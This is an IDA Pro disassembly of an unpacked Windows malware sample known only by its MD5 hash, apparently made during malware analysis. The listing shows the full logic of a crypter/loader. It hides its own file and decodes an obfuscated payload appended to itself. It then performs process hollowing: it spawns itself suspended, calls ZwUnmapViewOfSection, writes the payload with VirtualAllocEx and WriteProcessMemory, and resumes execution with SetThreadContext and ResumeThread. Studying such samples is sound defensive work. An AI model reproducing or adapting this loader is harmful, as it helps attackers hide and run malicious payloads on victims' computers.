;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6D66F68EF69955D172B58D1CFE925813
; File Name : u:\work\6d66f68ef69955d172b58d1cfe925813_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007042 ( 28738.)
; Section size in file : 00007042 ( 28738.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(int,FILE *File,int,int,int,int)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+60�p
var_13C = byte ptr -13Ch
Dst = word ptr -5Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = word ptr -16h
var_8 = word ptr -8
var_4 = dword ptr -4
File = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
push off_40B044 ; char *
call _printf
mov ebx, [ebp+File]
push 2 ; Origin
push 0 ; Offset
push ebx ; File
call _fseek
push ebx ; File
call _ftell
mov esi, eax
mov eax, Offset
sub esi, eax
push 0 ; Origin
add eax, 0FFFFFFFCh
push eax ; Offset
push ebx ; File
mov [ebp+var_4], esi
call _fseek
push ebx ; File
xor edi, edi
inc edi
push edi ; Count
push edi ; ElementSize
push offset byte_40B6EC ; DstBuf
call _fread
push ebx ; File
push edi ; Count
push edi ; ElementSize
push offset byte_40C0E4 ; DstBuf
call _fread
add esp, 40h
push ebx ; File
push edi ; Count
push edi ; ElementSize
push offset byte_40B6E0 ; DstBuf
call _fread
push ebx ; File
push edi ; Count
push edi ; ElementSize
push offset byte_40B6ED ; DstBuf
call _fread
mov al, 0Ah
sub al, byte_40B6EC
add esp, 20h
mov byte_40B6EC, al
mov al, 0Ah
sub al, byte_40C0E4
mov byte_40C0E4, al
mov al, 14h
sub al, byte_40B6E0
mov byte_40B6E0, al
mov al, 14h
sub al, byte_40B6ED
cmp esi, 40h
mov byte_40B6ED, al
jb loc_401172
push ebx ; File
push edi ; Count
push 40h ; ElementSize
mov esi, offset byte_40B6F0
push esi ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
loc_4010D0: ; CODE XREF: sub_401000+EC�j
mov dl, byte_40B6E0
lea eax, dword_40B6F1[ecx]
add [eax-1], dl
mov dl, byte_40B6ED
add [eax], dl
inc ecx
inc ecx
cmp ecx, 40h
jb short loc_4010D0
push 40h ; Size
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
push offset aGfsjdkljSdjLsf ; "gfsjdklj sdj lsfdjkl sjdfj skldjfsl jd"...
call _printf
add esp, 10h
cmp [ebp+Dst], 5A4Dh
jnz short loc_401172
mov eax, [ebp+var_20]
lea ecx, [eax+18h]
cmp [ebp+var_4], ecx
jb short loc_401172
mov ecx, Offset
push 0 ; Origin
add ecx, eax
push ecx ; Offset
push ebx ; File
call _fseek
push ebx ; File
push edi ; Count
push 18h ; ElementSize
push esi ; DstBuf
call _fread
add esp, 1Ch
xor edi, edi
loc_40113A: ; CODE XREF: sub_401000+156�j
mov cl, byte_40B6E0
lea eax, dword_40B6F1[edi]
add [eax-1], cl
mov cl, byte_40B6ED
add [eax], cl
inc edi
inc edi
cmp edi, 18h
jb short loc_40113A
push 18h ; Size
lea eax, [ebp+var_1C]
push esi ; Src
push eax ; Dst
call _memcpy
mov edi, 0E0h
add esp, 0Ch
cmp [ebp+var_8], di
jz short loc_401179
loc_401172: ; CODE XREF: sub_401000+B6�j
; sub_401000+10D�j ...
xor al, al
jmp loc_401243
; ---------------------------------------------------------------------------
loc_401179: ; CODE XREF: sub_401000+170�j
push ebx ; File
push 1 ; Count
push edi ; ElementSize
push esi ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
loc_401188: ; CODE XREF: sub_401000+1A3�j
mov dl, byte_40B6E0
lea eax, dword_40B6F1[ecx]
add [eax-1], dl
mov dl, byte_40B6ED
add [eax], dl
inc ecx
inc ecx
cmp ecx, edi
jb short loc_401188
push edi ; Size
lea eax, [ebp+var_13C]
push esi ; Src
push eax ; Dst
call _memcpy
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov [ebp+var_4], eax
movzx eax, [ebp+var_16]
push ebx ; File
lea eax, [eax+eax*4]
push 1 ; Count
shl eax, 3
push eax ; ElementSize
push esi ; DstBuf
call _fread
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
add esp, 20h
xor edi, edi
shl eax, 3
jz short loc_401208
loc_4011EB: ; CODE XREF: sub_401000+206�j
mov dl, byte_40B6E0
lea ecx, dword_40B6F1[edi]
add [ecx-1], dl
mov dl, byte_40B6ED
add [ecx], dl
inc edi
inc edi
cmp edi, eax
jb short loc_4011EB
loc_401208: ; CODE XREF: sub_401000+1E9�j
push eax ; Size
push esi ; Src
push [ebp+var_4] ; Dst
call _memcpy
mov edi, [ebp+arg_8]
mov eax, [ebp+arg_14]
add esp, 0Ch
push 10h
pop ecx
push 6
lea esi, [ebp+Dst]
rep movsd
mov edi, [ebp+arg_C]
pop ecx
lea esi, [ebp+var_1C]
rep movsd
mov edi, [ebp+arg_10]
push 38h
pop ecx
lea esi, [ebp+var_13C]
rep movsd
mov ecx, [ebp+var_4]
mov [eax], ecx
mov al, 1
loc_401243: ; CODE XREF: sub_401000+174�j
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401248 proc near ; CODE XREF: WinMain(x,x,x,x)+84�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_401265
lea ecx, [eax+1]
imul ecx, esi
loc_401265: ; CODE XREF: sub_401248+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_40129F
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_40127B: ; CODE XREF: sub_401248+53�j
mov edi, [ebx]
test edi, edi
jz short loc_401295
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_40128F
add ecx, edi
jmp short loc_401295
; ---------------------------------------------------------------------------
loc_40128F: ; CODE XREF: sub_401248+41�j
inc eax
imul eax, esi
add ecx, eax
loc_401295: ; CODE XREF: sub_401248+37�j
; sub_401248+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_40127B
pop edi
pop ebx
loc_40129F: ; CODE XREF: sub_401248+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_401248 endp
; =============== S U B R O U T I N E =======================================
sub_4012A4 proc near ; CODE XREF: sub_4012BE+AA�p
; sub_4012BE:loc_401424�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_4012B7
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4012B7: ; CODE XREF: sub_4012A4+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_4012A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4012BE(FILE *File,int,int,int,int,void *Dst)
sub_4012BE proc near ; CODE XREF: WinMain(x,x,x,x)+B8�p
DstBuf = byte ptr -32004h
var_4 = dword ptr -4
File = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
Dst = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 32004h
call __alloca_probe
push ebx
push esi
push edi
push off_40B044 ; char *
call _printf
push 0 ; Origin
push Offset ; Offset
push [ebp+File] ; File
call _fseek
mov eax, [ebp+arg_8]
movzx eax, word ptr [eax+6]
mov ebx, [ebp+arg_C]
mov esi, [ebx+3Ch]
add esp, 10h
test eax, eax
jle short loc_401311
mov ecx, [ebp+arg_10]
add ecx, 14h
loc_401303: ; CODE XREF: sub_4012BE+51�j
mov edx, [ecx]
cmp edx, esi
jnb short loc_40130B
mov esi, edx
loc_40130B: ; CODE XREF: sub_4012BE+49�j
add ecx, 28h
dec eax
jnz short loc_401303
loc_401311: ; CODE XREF: sub_4012BE+3D�j
push [ebp+File] ; File
mov edi, offset byte_40B6F0
push esi ; Count
push 1 ; ElementSize
push edi ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
test esi, esi
mov [ebp+var_4], eax
jbe short loc_40134B
loc_40132E: ; CODE XREF: sub_4012BE+8B�j
mov dl, byte_40B6E0
lea eax, dword_40B6F1[ecx]
add [eax-1], dl
mov dl, byte_40B6ED
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_40132E
loc_40134B: ; CODE XREF: sub_4012BE+6E�j
push esi ; Size
push edi ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+var_4], esi
jnz loc_40144B
mov ecx, [ebx+20h]
push ecx
push dword ptr [ebx+3Ch]
call sub_4012A4
mov ebx, eax
add ebx, [ebp+Dst]
mov eax, [ebp+arg_8]
and [ebp+Dst], 0
add esp, 8
cmp word ptr [eax+6], 0
jbe loc_401444
mov esi, [ebp+arg_10]
add esi, 8
loc_40138D: ; CODE XREF: sub_4012BE+180�j
mov edi, [esi+8]
test edi, edi
mov eax, [esi]
jbe loc_40141E
cmp edi, eax
jbe short loc_4013A0
mov edi, eax
loc_4013A0: ; CODE XREF: sub_4012BE+DE�j
mov eax, [esi+0Ch]
add eax, Offset
push 0 ; Origin
push eax ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
push edi ; Count
push 1 ; ElementSize
push eax ; DstBuf
call _fread
mov [ebp+var_4], eax
add esp, 1Ch
xor cl, cl
xor eax, eax
test edi, edi
jbe short loc_4013FD
loc_4013D4: ; CODE XREF: sub_4012BE+13D�j
test cl, cl
jnz short loc_4013E9
mov cl, byte_40B6EC
add [ebp+eax+DstBuf], cl
mov cl, 1
jmp short loc_4013F8
; ---------------------------------------------------------------------------
loc_4013E9: ; CODE XREF: sub_4012BE+118�j
mov cl, byte_40C0E4
add [ebp+eax+DstBuf], cl
xor cl, cl
loc_4013F8: ; CODE XREF: sub_4012BE+129�j
inc eax
cmp eax, edi
jb short loc_4013D4
loc_4013FD: ; CODE XREF: sub_4012BE+114�j
push edi ; Size
lea eax, [ebp+DstBuf]
push eax ; Src
push ebx ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+var_4], edi
jnz short loc_40144B
mov eax, [ebp+arg_C]
mov ecx, [eax+20h]
push ecx
push dword ptr [esi]
jmp short loc_401424
; ---------------------------------------------------------------------------
loc_40141E: ; CODE XREF: sub_4012BE+D6�j
test eax, eax
jz short loc_40142E
push ecx
push eax
loc_401424: ; CODE XREF: sub_4012BE+15E�j
call sub_4012A4
add esp, 8
add ebx, eax
loc_40142E: ; CODE XREF: sub_4012BE+162�j
mov eax, [ebp+arg_8]
movzx eax, word ptr [eax+6]
inc [ebp+Dst]
add esi, 28h
cmp [ebp+Dst], eax
jl loc_40138D
loc_401444: ; CODE XREF: sub_4012BE+C3�j
mov al, 1
loc_401446: ; CODE XREF: sub_4012BE+18F�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40144B: ; CODE XREF: sub_4012BE+9D�j
; sub_4012BE+153�j
xor al, al
jmp short loc_401446
sub_4012BE endp
; =============== S U B R O U T I N E =======================================
sub_40144F proc near ; CODE XREF: sub_4015BE+CD�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_8]
mov ecx, [eax+88h]
test ecx, ecx
jz short locret_4014BD
cmp dword ptr [eax+8Ch], 0
jz short locret_4014BD
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [eax+1Ch]
add ecx, edx
cmp dword ptr [ecx+4], 0
jz short loc_4014BC
push ebx
push edi
loc_40147C: ; CODE XREF: sub_40144F+69�j
mov eax, [ecx+4]
sub eax, 8
shr eax, 1
test eax, eax
lea edi, [ecx+8]
jle short loc_4014B2
mov ebx, eax
loc_40148D: ; CODE XREF: sub_40144F+61�j
xor edx, edx
mov dx, [edi]
mov eax, edx
and eax, 0FFFh
add eax, [ecx]
and dx, 0F000h
add eax, [esp+0Ch+arg_10]
cmp dx, 3000h
jnz short loc_4014AD
add [eax], esi
loc_4014AD: ; CODE XREF: sub_40144F+5A�j
inc edi
inc edi
dec ebx
jnz short loc_40148D
loc_4014B2: ; CODE XREF: sub_40144F+3A�j
cmp dword ptr [edi+4], 0
mov ecx, edi
jnz short loc_40147C
pop edi
pop ebx
loc_4014BC: ; CODE XREF: sub_40144F+29�j
pop esi
locret_4014BD: ; CODE XREF: sub_40144F+C�j
; sub_40144F+15�j
retn
sub_40144F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014BE proc near ; CODE XREF: sub_4015BE+18�p
var_168 = byte ptr -168h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 168h
push ebx
push esi
push edi
push 10h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_64], ebx
lea edi, [ebp+var_60]
rep stosd
push 104h
lea eax, [ebp+var_168]
push eax
push ebx
call ds:dword_409010 ; GetModuleFileNameA
mov esi, [ebp+arg_0]
push esi
lea eax, [ebp+var_64]
push eax
push ebx
push ebx
push 4
push ebx
push ebx
push ebx
lea eax, [ebp+var_168]
push eax
push ebx
call ds:dword_40900C ; CreateProcessA
test eax, eax
jz short loc_40156E
mov edi, [ebp+arg_4]
push edi
mov dword ptr [edi], 10007h
push dword ptr [esi+4]
call ds:dword_409008 ; GetThreadContext
mov ebx, [ebp+arg_8]
lea eax, [ebp+var_4]
push eax
mov eax, [edi+0A4h]
push 4
push ebx
add eax, 8
push eax
push dword ptr [esi]
call ds:dword_409004 ; ReadProcessMemory
mov edi, [ebx]
mov ebx, ds:dword_409000
jmp short loc_401552
; ---------------------------------------------------------------------------
loc_401546: ; CODE XREF: sub_4014BE+A1�j
cmp [ebp+var_10], 10000h
jz short loc_401561
add edi, [ebp+var_14]
loc_401552: ; CODE XREF: sub_4014BE+86�j
push 1Ch
lea eax, [ebp+var_20]
push eax
push edi
push dword ptr [esi]
call ebx ; VirtualQueryEx
test eax, eax
jnz short loc_401546
loc_401561: ; CODE XREF: sub_4014BE+8F�j
mov eax, [ebp+arg_8]
sub edi, [eax]
mov [eax+4], edi
xor eax, eax
inc eax
jmp short loc_401570
; ---------------------------------------------------------------------------
loc_40156E: ; CODE XREF: sub_4014BE+4D�j
xor eax, eax
loc_401570: ; CODE XREF: sub_4014BE+AE�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014BE endp
; =============== S U B R O U T I N E =======================================
sub_401575 proc near ; CODE XREF: sub_4015BE+95�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_40158F
cmp dword ptr [eax+8Ch], 0
jz short loc_40158F
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40158F: ; CODE XREF: sub_401575+B�j
; sub_401575+14�j
xor eax, eax
retn
sub_401575 endp
; =============== S U B R O U T I N E =======================================
sub_401592 proc near ; CODE XREF: sub_4015BE+6F�p
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset aNtdll_dll ; "ntdll.dll"
call ds:dword_409018 ; GetModuleHandleA
push eax
call ds:dword_409014 ; GetProcAddress
push dword_40C0E8
push dword_40B6E8
call eax
neg eax
sbb al, al
inc al
retn
sub_401592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015BE proc near ; CODE XREF: WinMain(x,x,x,x)+D7�p
var_2E8 = dword ptr -2E8h
var_244 = dword ptr -244h
var_238 = dword ptr -238h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2E8h
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_2E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4014BE
add esp, 0Ch
test eax, eax
jz locret_401728
mov eax, [ebp+var_18]
push ebx
mov ebx, [ebp+arg_8]
cmp [ebx+1Ch], eax
push esi
mov esi, ds:dword_40902C
push edi
mov edi, 3000h
jnz short loc_40161F
mov ecx, [ebp+var_14]
cmp [ebp+arg_14], ecx
ja short loc_40161F
lea edx, [ebp+var_1C]
push edx
push 40h
push ecx
push eax
push [ebp+var_10]
mov dword_40C0F0, eax
call ds:dword_409028 ; VirtualProtectEx
jmp short loc_401649
; ---------------------------------------------------------------------------
loc_40161F: ; CODE XREF: sub_4015BE+3F�j
; sub_4015BE+47�j
mov ecx, [ebp+var_10]
mov dword_40B6E8, ecx
mov dword_40C0E8, eax
call sub_401592
cmp al, 1
jnz short loc_401649
push 40h
push edi
push [ebp+arg_14]
push dword ptr [ebx+1Ch]
push [ebp+var_10]
call esi ; VirtualAllocEx
mov dword_40C0F0, eax
loc_401649: ; CODE XREF: sub_4015BE+5F�j
; sub_4015BE+76�j
cmp dword_40C0F0, 0
jnz short loc_40169C
push ebx
call sub_401575
add esp, 4
test eax, eax
jz loc_40171A
push 40h
push edi
push [ebp+arg_14]
push 0
push [ebp+var_10]
call esi ; VirtualAllocEx
test eax, eax
mov dword_40C0F0, eax
jz loc_40171A
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40144F
add esp, 18h
cmp dword_40C0F0, 0
jz short loc_40171A
loc_40169C: ; CODE XREF: sub_4015BE+92�j
mov eax, [ebp+var_244]
push 0
push 4
push offset dword_40C0F0
add eax, 8
push eax
push [ebp+var_10]
call ds:dword_409024 ; WriteProcessMemory
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_40C0F0
mov edx, [ebp+arg_10]
mov [eax+edx+34h], ecx
mov eax, dword_40C0F0
cmp eax, [ebp+var_18]
mov [ebp+var_2E8], 10007h
jnz short loc_4016ED
mov eax, [ebx+10h]
add eax, [ebx+1Ch]
mov [ebp+var_238], eax
jmp short loc_4016F8
; ---------------------------------------------------------------------------
loc_4016ED: ; CODE XREF: sub_4015BE+11F�j
mov ecx, [ebx+10h]
add ecx, eax
mov [ebp+var_238], ecx
loc_4016F8: ; CODE XREF: sub_4015BE+12D�j
lea eax, [ebp+var_2E8]
push eax
push [ebp+var_C]
call ds:dword_409020 ; SetThreadContext
mov eax, [ebp+var_10]
mov dword_40C0EC, eax
mov eax, [ebp+var_C]
mov dword_40B6E4, eax
jmp short loc_401725
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_4015BE+9F�j
; sub_4015BE+B9�j ...
push 0
push [ebp+var_10]
call ds:dword_40901C ; TerminateProcess
loc_401725: ; CODE XREF: sub_4015BE+15A�j
pop edi
pop esi
pop ebx
locret_401728: ; CODE XREF: sub_4015BE+22�j
leave
retn
sub_4015BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
var_240 = byte ptr -240h
var_13C = dword ptr -13Ch
var_5C = dword ptr -5Ch
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push 104h
lea eax, [ebp+var_240]
push eax
push 0
call ds:dword_409010 ; GetModuleFileNameA
push 6
lea eax, [ebp+var_240]
push eax
call ds:dword_409038 ; SetFileAttributesA
lea eax, [ebp+var_240]
push offset aRb ; "rb"
push eax ; char *
call _fopen
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_401841
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
lea eax, [ebp+var_1C]
push eax ; int
lea eax, [ebp+var_5C]
push eax ; int
push ebx ; File
push 0Bh ; int
call sub_401000
add esp, 18h
test al, al
jz loc_401841
push esi
push edi
push [ebp+var_4]
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_401248
add esp, 10h
push 40h
push 1000h
mov edi, eax
push edi
push 0
call ds:dword_409034 ; VirtualAlloc
mov esi, eax
test esi, esi
jz short loc_40183F
push esi ; Dst
push [ebp+var_4] ; int
lea eax, [ebp+var_13C]
push eax ; int
lea eax, [ebp+var_1C]
push eax ; int
lea eax, [ebp+var_5C]
push eax ; int
push ebx ; File
call sub_4012BE
push ebx ; File
call _fclose
push edi
push esi
push [ebp+var_4]
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_4015BE
add esp, 34h
push 0
push edi
push esi
push dword_40C0F0
push dword_40C0EC
call ds:dword_409024 ; WriteProcessMemory
test eax, eax
jz short loc_401831
push dword_40B6E4
call ds:dword_409030 ; ResumeThread
jmp short loc_40183F
; ---------------------------------------------------------------------------
loc_401831: ; CODE XREF: WinMain(x,x,x,x)+F7�j
push 0
push dword_40C0EC
call ds:dword_40901C ; TerminateProcess
loc_40183F: ; CODE XREF: WinMain(x,x,x,x)+A2�j
; WinMain(x,x,x,x)+105�j
pop edi
pop esi
loc_401841: ; CODE XREF: WinMain(x,x,x,x)+44�j
; WinMain(x,x,x,x)+6A�j
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [000000E9 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; [00000159 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _printf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_fast_error_exit:
cmp dword_40C0FC, 1
jnz short loc_401FA3
call __FF_MSGBANNER
loc_401FA3: ; CODE XREF: .text:00401F9C�j
push dword ptr [esp+4]
call __NMSG_WRITE
push 0FFh
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_check_managed_app:
push 0
call ds:dword_409018 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_401FE7
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_401FE7
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_401FFD
cmp eax, 20Bh
jz short loc_401FEA
loc_401FE7: ; CODE XREF: .text:00401FC6�j
; .text:00401FD3�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_401FEA: ; CODE XREF: .text:00401FE5�j
xor eax, eax
cmp dword ptr [ecx+84h], 0Eh
jbe short locret_40200E
cmp [ecx+0F8h], eax
jmp short loc_40200B
; ---------------------------------------------------------------------------
loc_401FFD: ; CODE XREF: .text:00401FDE�j
xor eax, eax
cmp dword ptr [ecx+74h], 0Eh
jbe short locret_40200E
cmp [ecx+0E8h], eax
loc_40200B: ; CODE XREF: .text:00401FFB�j
setnz al
locret_40200E: ; CODE XREF: .text:00401FF3�j
; .text:00402003�j
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001EE BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__initterm_e:
push esi
mov esi, eax
xor eax, eax
jmp short loc_402599
; ---------------------------------------------------------------------------
loc_40258A: ; CODE XREF: .text:0040259D�j
test eax, eax
jnz short loc_40259F
mov ecx, [esi]
test ecx, ecx
jz short loc_402596
call ecx
loc_402596: ; CODE XREF: .text:00402592�j
add esi, 4
loc_402599: ; CODE XREF: .text:00402588�j
cmp esi, [esp+8]
jb short loc_40258A
loc_40259F: ; CODE XREF: .text:0040258C�j
pop esi
retn
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__ioterm:
push esi
mov esi, offset dword_40D5A0
loc_4028BD: ; CODE XREF: .text:004028D6�j
mov eax, [esi]
test eax, eax
jz short loc_4028CD
push eax
call _free
and dword ptr [esi], 0
pop ecx
loc_4028CD: ; CODE XREF: .text:004028C1�j
add esi, 4
cmp esi, offset dword_40D6A0
jl short loc_4028BD
pop esi
retn
; [0000008C BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402A6B proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_402A6B endp
; [00000088 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_get_int_arg:
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
; ---------------------------------------------------------------------------
_get_int64_arg:
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
; ---------------------------------------------------------------------------
_get_short_arg:
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
